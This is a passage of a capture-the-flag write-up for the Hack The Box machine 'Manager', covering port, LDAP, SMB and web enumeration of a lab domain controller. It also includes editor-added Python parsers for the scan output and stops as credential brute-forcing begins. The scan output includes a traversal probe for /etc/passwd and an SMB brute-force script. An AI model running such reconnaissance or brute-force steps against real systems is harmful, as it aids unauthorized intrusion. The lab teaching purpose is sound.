
【Hack The Box】Manager【WriteUp】

Posted at 2024-03-16

Introduction

Hello, I'm a hopelessly mediocre wannabe engineer.
This article is my write-up of the Hack The Box (see link below) machine "Manager".
Note: this post does not go into details such as how to use the tools covered in earlier posts.

Note: do not misuse any of this. Use these techniques only to contribute to society; otherwise you are breaking the law.

Initial enumeration

Port scan

┌──(root㉿kali)-[~]
└─# rustscan -a 10.129.144.138 --top --ulimit 5000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.144.138:53
Open 10.129.144.138:80
Open 10.129.144.138:88
Open 10.129.144.138:135
Open 10.129.144.138:139
Open 10.129.144.138:389
Open 10.129.144.138:445
Open 10.129.144.138:464
Open 10.129.144.138:593
Open 10.129.144.138:636
Open 10.129.144.138:9389
Open 10.129.144.138:49667
Open 10.129.144.138:49677
Open 10.129.144.138:49678
Open 10.129.144.138:49679
Open 10.129.144.138:49716
Open 10.129.144.138:50765
Open 10.129.144.138:56418
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 06:12 EDT
Initiating Ping Scan at 06:12
Scanning 10.129.144.138 [4 ports]
Completed Ping Scan at 06:12, 0.28s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:12
Completed Parallel DNS resolution of 1 host. at 06:12, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 06:12
Scanning 10.129.144.138 [18 ports]
Discovered open port 135/tcp on 10.129.144.138
Discovered open port 445/tcp on 10.129.144.138
Discovered open port 53/tcp on 10.129.144.138
Discovered open port 49677/tcp on 10.129.144.138
Discovered open port 80/tcp on 10.129.144.138
Discovered open port 139/tcp on 10.129.144.138
Discovered open port 464/tcp on 10.129.144.138
Discovered open port 50765/tcp on 10.129.144.138
Discovered open port 88/tcp on 10.129.144.138
Discovered open port 49678/tcp on 10.129.144.138
Discovered open port 49716/tcp on 10.129.144.138
Discovered open port 56418/tcp on 10.129.144.138
Discovered open port 49679/tcp on 10.129.144.138
Discovered open port 593/tcp on 10.129.144.138
Discovered open port 49667/tcp on 10.129.144.138
Discovered open port 636/tcp on 10.129.144.138
Discovered open port 389/tcp on 10.129.144.138
Discovered open port 9389/tcp on 10.129.144.138
Completed SYN Stealth Scan at 06:12, 0.56s elapsed (18 total ports)
Nmap scan report for 10.129.144.138
Host is up, received echo-reply ttl 127 (0.27s latency).
Scanned at 2023-10-24 06:12:50 EDT for 1s

PORT      STATE SERVICE        REASON
53/tcp    open  domain         syn-ack ttl 127
80/tcp    open  http           syn-ack ttl 127
88/tcp    open  kerberos-sec   syn-ack ttl 127
135/tcp   open  msrpc          syn-ack ttl 127
139/tcp   open  netbios-ssn    syn-ack ttl 127
389/tcp   open  ldap           syn-ack ttl 127
445/tcp   open  microsoft-ds   syn-ack ttl 127
464/tcp   open  kpasswd5       syn-ack ttl 127
593/tcp   open  http-rpc-epmap syn-ack ttl 127
636/tcp   open  ldapssl        syn-ack ttl 127
9389/tcp  open  adws           syn-ack ttl 127
49667/tcp open  unknown        syn-ack ttl 127
49677/tcp open  unknown        syn-ack ttl 127
49678/tcp open  unknown        syn-ack ttl 127
49679/tcp open  unknown        syn-ack ttl 127
49716/tcp open  unknown        syn-ack ttl 127
50765/tcp open  unknown        syn-ack ttl 127
56418/tcp open  unknown        syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds
           Raw packets sent: 22 (944B) | Rcvd: 19 (820B)

The ports commonly seen in Windows (Active Directory) environments are exposed.

Domain information gathering

Run the nmap LDAP script as well to quickly collect information about the AD environment.

┌──(root㉿kali)-[~]
└─# nmap -p 389 -n -Pn 10.129.144.138 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 06:14 EDT
Nmap scan report for 10.129.144.138
Host is up (0.26s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=manager,DC=htb
|       ldapServiceName: manager.htb:dc01$@MANAGER.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
|       supportedControl: 1.2.840.113556.1.4.2330
|       supportedControl: 1.2.840.113556.1.4.2354
|       supportedCapabilities: 1.2.840.113556.1.4.800
|       supportedCapabilities: 1.2.840.113556.1.4.1670
|       supportedCapabilities: 1.2.840.113556.1.4.1791
|       supportedCapabilities: 1.2.840.113556.1.4.1935
|       supportedCapabilities: 1.2.840.113556.1.4.2080
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=manager,DC=htb
|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=manager,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=manager,DC=htb
|       namingContexts: DC=manager,DC=htb
|       namingContexts: CN=Configuration,DC=manager,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=manager,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=manager,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=manager,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 138319
|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=manager,DC=htb
|       dnsHostName: dc01.manager.htb
|       defaultNamingContext: DC=manager,DC=htb
|       currentTime: 20231024171421.0Z
|_      configurationNamingContext: CN=Configuration,DC=manager,DC=htb
Service Info: Host: DC01; OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds

We obtained the domain information for manager.htb. Put it in /etc/hosts as follows:

10.129.144.138    manager.htb
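From the rootDSE listing above a tester records the domain, the DC's DNS name, the /etc/hosts line and the DC's clock. As an added example that is not part of the original post, the Python script below parses nmap's ldap-rootdse output into a dictionary and derives those values; it also compares the DC's currentTime with the scanning host's clock, because Kerberos (port 88) rejects requests whose timestamps differ from the KDC by more than the 5-minute Windows default tolerance. The abridged output, the scanner timestamp (constructed to match the 06:14 EDT scan start shown above) and the function names are the editor's assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed, abridged copy of the nmap ldap-rootdse listing shown above.
ROOTDSE_OUTPUT = """\
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       rootDomainNamingContext: DC=manager,DC=htb
|       ldapServiceName: manager.htb:dc01$@MANAGER.HTB
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=manager,DC=htb
|       dnsHostName: dc01.manager.htb
|       defaultNamingContext: DC=manager,DC=htb
|       currentTime: 20231024171421.0Z
|_      configurationNamingContext: CN=Configuration,DC=manager,DC=htb
"""

# Windows default for "Maximum tolerance for computer clock synchronization".
KERBEROS_MAX_SKEW = timedelta(minutes=5)

# One attribute per line: "|" (or "|_" on the last line), spaces, name, colon, value.
ATTR_RE = re.compile(r"^\|_?\s+([A-Za-z]+):\s*(.*)$")


def parse_rootdse(text):
    """Turn the nmap ldap-rootdse listing into {attribute: [values]}.
    Multi-valued attributes (supportedSASLMechanisms, namingContexts) stay lists."""
    attrs = {}
    for line in text.splitlines():
        m = ATTR_RE.match(line)
        if m:
            attrs.setdefault(m.group(1), []).append(m.group(2).strip())
    return attrs


def dn_to_domain(dn):
    """'DC=manager,DC=htb' -> 'manager.htb' (only the DC= components are used)."""
    return ".".join(rdn.split("=", 1)[1] for rdn in dn.split(",")
                    if rdn.upper().startswith("DC="))


def parse_generalized_time(value):
    """LDAP GeneralizedTime such as '20231024171421.0Z' -> aware UTC datetime."""
    base = value.split(".")[0].rstrip("Z")
    return datetime.strptime(base, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


def summarize_rootdse(text, ip, scanner_time_utc):
    """Extract domain, DC host, the /etc/hosts line, the SASL mechanisms offered,
    and the clock offset between the DC and the scanning host."""
    attrs = parse_rootdse(text)
    domain = dn_to_domain(attrs["defaultNamingContext"][0])
    dc_host = attrs["dnsHostName"][0]
    skew = parse_generalized_time(attrs["currentTime"][0]) - scanner_time_utc
    return {
        "domain": domain,
        "dc_host": dc_host,
        "hosts_entry": f"{ip}    {domain} {dc_host}",
        "sasl": attrs.get("supportedSASLMechanisms", []),
        "skew_seconds": int(skew.total_seconds()),
        "kerberos_clock_ok": abs(skew) <= KERBEROS_MAX_SKEW,
    }


def example_summary():
    # Constructed scanner clock: the scan above started at 06:14 EDT, i.e. 10:14 UTC.
    scanner_clock = datetime(2023, 10, 24, 10, 14, 25, tzinfo=timezone.utc)
    return summarize_rootdse(ROOTDSE_OUTPUT, "10.129.144.138", scanner_clock)


if __name__ == "__main__":
    for key, value in example_summary().items():
        print(f"{key}: {value}")
```

The DC's clock comes out about seven hours ahead of the scanner, the same offset that nmap's ssl-date and clock-skew lines report later in this write-up. From an auditing point of view a DC this far off its clients is a finding in its own right: Kerberos logons from correctly synchronised hosts fail exactly the same way.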

Run enum4linux as well.

┌──(root㉿kali)-[~]
└─# enum4linux 10.129.144.138                     
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 24 06:16:32 2023

 =========================================( Target Information )=========================================
                                                                                                                                                           
Target ........... 10.129.144.138                                                                                                                          
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.129.144.138 )===========================
                                                                                                                                                           
                                                                                                                                                           
[E] Can't find workgroup/domain                                                                                                                            
                                                                                                                                                           
                                                                                                                                                           

 ===============================( Nbtstat Information for 10.129.144.138 )===============================
                                                                                                                                                           
Looking up status of 10.129.144.138                                                                                                                        
No reply from 10.129.144.138

 ==================================( Session Check on 10.129.144.138 )==================================
                                                                                                                                                           
                                                                                                                                                           
[+] Server 10.129.144.138 allows sessions using username '', password ''                                                                                   
                                                                                                                                                           
                                                                                                                                                           
 ===============================( Getting domain SID for 10.129.144.138 )===============================
                                                                                                                                                           
Domain Name: MANAGER                                                                                                                                       
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209

[+] Host is part of a domain (not a workgroup)                                                                                                             
                                                                                                                                                           
                                                                                                                                                           
 ==================================( OS information on 10.129.144.138 )==================================
                                                                                                                                                           
                                                                                                                                                           
[E] Can't get OS info with smbclient                                                                                                                       
                                                                                                                                                           
                                                                                                                                                           
[+] Got OS info for 10.129.144.138 from srvinfo:                                                                                                           
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED                                                                                     


 ======================================( Users on 10.129.144.138 )======================================
                                                                                                                                                           
                                                                                                                                                           
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED                                                                                       
                                                                                                                                                           
                                                                                                                                                           

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED                                                                                        
                                                                                                                                                           
                                                                                                                                                           
 ================================( Share Enumeration on 10.129.144.138 )================================
                                                                                                                                                           
do_connect: Connection to 10.129.144.138 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                                                  

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.129.144.138                                                                                                             
                                                                                                                                                           
                                                                                                                                                           
 ===========================( Password Policy Information for 10.129.144.138 )===========================
                                                                                                                                                           
                                                                                                                                                           
[E] Unexpected error from polenum:                                                                                                                         
                                                                                                                                                           
                                                                                                                                                           

[+] Attaching to 10.129.144.138 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.129.144.138)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient                                                                                                           
                                                                                                                                                           
                                                                                                                                                           

 ======================================( Groups on 10.129.144.138 )======================================
                                                                                                                                                           
                                                                                                                                                           
[+] Getting builtin groups:                                                                                                                                
                                                                                                                                                           
                                                                                                                                                           
[+]  Getting builtin group memberships:                                                                                                                    
                                                                                                                                                           
                                                                                                                                                           
[+]  Getting local groups:                                                                                                                                 
                                                                                                                                                           
                                                                                                                                                           
[+]  Getting local group memberships:                                                                                                                      
                                                                                                                                                           
                                                                                                                                                           
[+]  Getting domain groups:                                                                                                                                
                                                                                                                                                           
                                                                                                                                                           
[+]  Getting domain group memberships:                                                                                                                     
                                                                                                                                                           
                                                                                                                                                           
 =================( Users on 10.129.144.138 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                                                           
                                                                                                                                                           
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.                                                                                  
                                                                                                                                                           
                                                                                                                                                           
 ==============================( Getting printer info for 10.129.144.138 )==============================
                                                                                                                                                           
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED                                                                                    


enum4linux complete on Tue Oct 24 06:17:37 2023

Also enumerate with rpcclient.

┌──(root㉿kali)-[~]
└─# rpcclient 10.129.144.138 -U '' -N 
rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
Domain Name: MANAGER
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> 

Probe with smbclient too.

┌──(root㉿kali)-[~]
└─# smbclient -N -L \\\\10.129.144.138

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.144.138 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Apart from the domain information, nothing particularly useful turned up.

Web enumeration

Browsing

Port 80 was open, so let's open it in a browser.
(screenshot: 1.png)
Hmm. I clicked around but nothing looks useful.
Let's dig deeper.

dirsearch

Enumerate the directory tree.

┌──(root㉿kali)-[~]
└─# dirsearch -u http://manager.htb/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/manager.htb/-_23-10-24_06-23-43.txt

Error Log: /root/.dirsearch/logs/errors-23-10-24_06-23-43.log

Target: http://manager.htb/

[06:23:44] Starting: 
[06:23:47] 403 -  312B  - /%2e%2e//google.com                              
[06:23:47] 301 -  145B  - /js  ->  http://manager.htb/js/                  
[06:24:12] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[06:24:15] 200 -    5KB - /about.html                                       
[06:24:43] 200 -    5KB - /contact.html                                     
[06:24:44] 301 -  146B  - /css  ->  http://manager.htb/css/                 
[06:24:56] 403 -    1KB - /images/                                          
[06:24:56] 301 -  149B  - /images  ->  http://manager.htb/images/           
[06:24:57] 200 -   18KB - /index.html                                       
[06:25:00] 403 -    1KB - /js/                                              

Nothing useful turned up, so let's try another tool.

gobuster

Download the wordlist from SecLists (below) and use it.

┌──(root㉿kali)-[~/work]
└─# gobuster dir -u http://manager.htb/ -k -x html -w ./directory-list-2.3-small.txt -t 200 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://manager.htb/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                ./directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/about.html           (Status: 200) [Size: 5386]
/contact.html         (Status: 200) [Size: 5317]
/index.html           (Status: 200) [Size: 18203]
/images               (Status: 301) [Size: 149] [--> http://manager.htb/images/]
/Images               (Status: 301) [Size: 149] [--> http://manager.htb/Images/]
/service.html         (Status: 200) [Size: 7900]
/css                  (Status: 301) [Size: 146] [--> http://manager.htb/css/]
/About.html           (Status: 200) [Size: 5386]
/Index.html           (Status: 200) [Size: 18203]
/Contact.html         (Status: 200) [Size: 5317]
/js                   (Status: 301) [Size: 145] [--> http://manager.htb/js/]
/IMAGES               (Status: 301) [Size: 149] [--> http://manager.htb/IMAGES/]
/Service.html         (Status: 200) [Size: 7900]
/INDEX.html           (Status: 200) [Size: 18203]
/CSS                  (Status: 301) [Size: 146] [--> http://manager.htb/CSS/]
/JS                   (Status: 301) [Size: 145] [--> http://manager.htb/JS/]
/CONTACT.html         (Status: 200) [Size: 5317]
/ABOUT.html           (Status: 200) [Size: 5386]
Progress: 175328 / 175330 (100.00%)
===============================================================
Finished
===============================================================

Nothing particularly useful here either.
I can't find anything...
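The gobuster run above reports the same resources under several spellings (/about.html, /About.html and /ABOUT.html all return 200 with 5386 bytes) because IIS serves files from a case-insensitive filesystem, so the wordlist's case variants cost extra requests and log noise without finding anything new. As an added example that is not part of the original post, the Python below parses the gobuster output, collapses hits that differ only by case when their status and size agree, and flags the target as case-insensitive; the parsing regex and function names are the editor's assumptions.

```python
import re

# Constructed copy of the gobuster result lines shown above.
GOBUSTER_OUTPUT = """\
/about.html           (Status: 200) [Size: 5386]
/contact.html         (Status: 200) [Size: 5317]
/index.html           (Status: 200) [Size: 18203]
/images               (Status: 301) [Size: 149] [--> http://manager.htb/images/]
/Images               (Status: 301) [Size: 149] [--> http://manager.htb/Images/]
/service.html         (Status: 200) [Size: 7900]
/css                  (Status: 301) [Size: 146] [--> http://manager.htb/css/]
/About.html           (Status: 200) [Size: 5386]
/Index.html           (Status: 200) [Size: 18203]
/Contact.html         (Status: 200) [Size: 5317]
/js                   (Status: 301) [Size: 145] [--> http://manager.htb/js/]
/IMAGES               (Status: 301) [Size: 149] [--> http://manager.htb/IMAGES/]
/Service.html         (Status: 200) [Size: 7900]
/INDEX.html           (Status: 200) [Size: 18203]
/CSS                  (Status: 301) [Size: 146] [--> http://manager.htb/CSS/]
/JS                   (Status: 301) [Size: 145] [--> http://manager.htb/JS/]
/CONTACT.html         (Status: 200) [Size: 5317]
/ABOUT.html           (Status: 200) [Size: 5386]
"""

# gobuster "dir" mode result line: path, status code, response size (redirect target optional).
HIT_RE = re.compile(r"^(\S+)\s+\(Status:\s*(\d+)\)\s+\[Size:\s*(\d+)\]")


def parse_gobuster(text):
    """Parse result lines into dicts; banner, separator and progress lines are ignored."""
    hits = []
    for line in text.splitlines():
        m = HIT_RE.match(line)
        if m:
            hits.append({"path": m.group(1), "status": int(m.group(2)), "size": int(m.group(3))})
    return hits


def group_case_variants(hits):
    """Group hits whose paths differ only by letter case and whose status and size agree.
    The size check keeps genuinely different files apart on a case-sensitive server.
    Returns {(lowercased path, status, size): [paths as reported]}."""
    groups = {}
    for h in hits:
        key = (h["path"].lower(), h["status"], h["size"])
        groups.setdefault(key, []).append(h["path"])
    return groups


def unique_resources(hits):
    """The distinct resources behind the hits, one lower-cased path each, sorted."""
    return sorted({key[0] for key in group_case_variants(hits)})


def looks_case_insensitive(hits, min_groups=2):
    """Heuristic: the server treats paths case-insensitively (IIS on NTFS does) when at
    least `min_groups` resources were reported under two or more different spellings."""
    multi = [paths for paths in group_case_variants(hits).values() if len(set(paths)) > 1]
    return len(multi) >= min_groups


if __name__ == "__main__":
    found = parse_gobuster(GOBUSTER_OUTPUT)
    print(f"{len(found)} hits, {len(unique_resources(found))} distinct resources")
    print("case-insensitive target:", looks_case_insensitive(found))
    for path in unique_resources(found):
        print(" ", path)
```

On this output 18 hits collapse to 7 resources, which is the set the author had already seen in the dirsearch run plus /service.html.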

Investigation with nmap scripts

smb

Check whether SMB has any holes.

┌──(root㉿kali)-[~/work]
└─# nmap -n -Pn 10.129.144.138 -p 135,139,445 --script smb-protocols,smb-brute,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-services,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-os-discovery
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 06:41 EDT
Nmap scan report for 10.129.144.138
Host is up (0.28s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2:0:2
|     2:1:0
|     3:0:0
|     3:0:2
|_    3:1:1

Nmap done: 1 IP address (1 host up) scanned in 29.35 seconds

Nothing.

The -A option

┌──(root㉿kali)-[~/work]
└─# nmap -n -Pn 10.129.144.138 -A
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 06:52 EDT
Nmap scan report for 10.129.144.138
Host is up (0.27s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-24 17:53:17Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T17:54:48+00:00; +6h59m56s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T17:54:47+00:00; +6h59m56s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.144.138:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.144.138:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-24T04:59:05
|_Not valid after:  2053-10-24T04:59:05
|_ssl-date: 2023-10-24T17:54:48+00:00; +6h59m56s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-24T17:54:48+00:00; +6h59m56s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-24T17:54:47+00:00; +6h59m56s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m55s
| smb2-time: 
|   date: 2023-10-24T17:54:10
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   270.89 ms 10.10.14.1
2   271.21 ms 10.129.144.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.58 second

So there's MS SQL on 1433.
Nothing else stands out.
Guess I'll try brute-forcing...

Credential harvesting

SMB is open, so I'll run crackmapexec against it.

┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.129.144.138 --pass-pol -u "guest" -p ""
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
